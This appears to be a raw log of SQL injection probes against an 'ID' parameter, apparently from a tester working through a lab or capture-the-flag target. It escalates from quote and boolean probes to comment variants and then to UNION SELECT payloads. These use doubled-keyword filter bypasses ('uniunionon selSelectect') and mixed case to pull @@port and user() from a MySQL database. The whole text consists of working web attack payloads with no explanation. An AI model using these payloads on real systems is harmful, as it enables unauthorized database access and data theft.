ID:1
ID:1'
ID:1"
ID:1' AND 1=1 -- 
ID:1 AND 1=1 -- 
ID:1 AND 1=0 -- 
ID:1" AND 1=0 -- 
ID:1" AND 1=1 -- 
ID:1' AND 1=1 -- 
ID:1') AND 1=1 -- 
ID:1\
ID:1')
ID:1') -- 
ID:1 -- 
ID:1 AND 1 -- 
ID:1 AND 0 -- 
ID:1') AND 0 -- 
ID:1') AND 1 -- 
ID:1') AND 1 -- 
ID:1')
AND
1
 -- 
ID:1')
AND
1
#
ID:1') #
ID:1') #
ID:1') #
ID:99') 
uniunionon
  selSelectect
 1,@@port,3
OR ('1
ID:99') 
UnIoN
 SeLect
 1,@@port,3
OR ('1
ID:99') 
UnIoN
all
 SeLect
 1,@@port,3
OR ('1
ID:99') 
UnIoN
all
 SeLect
 1,user(),3
OR ('1
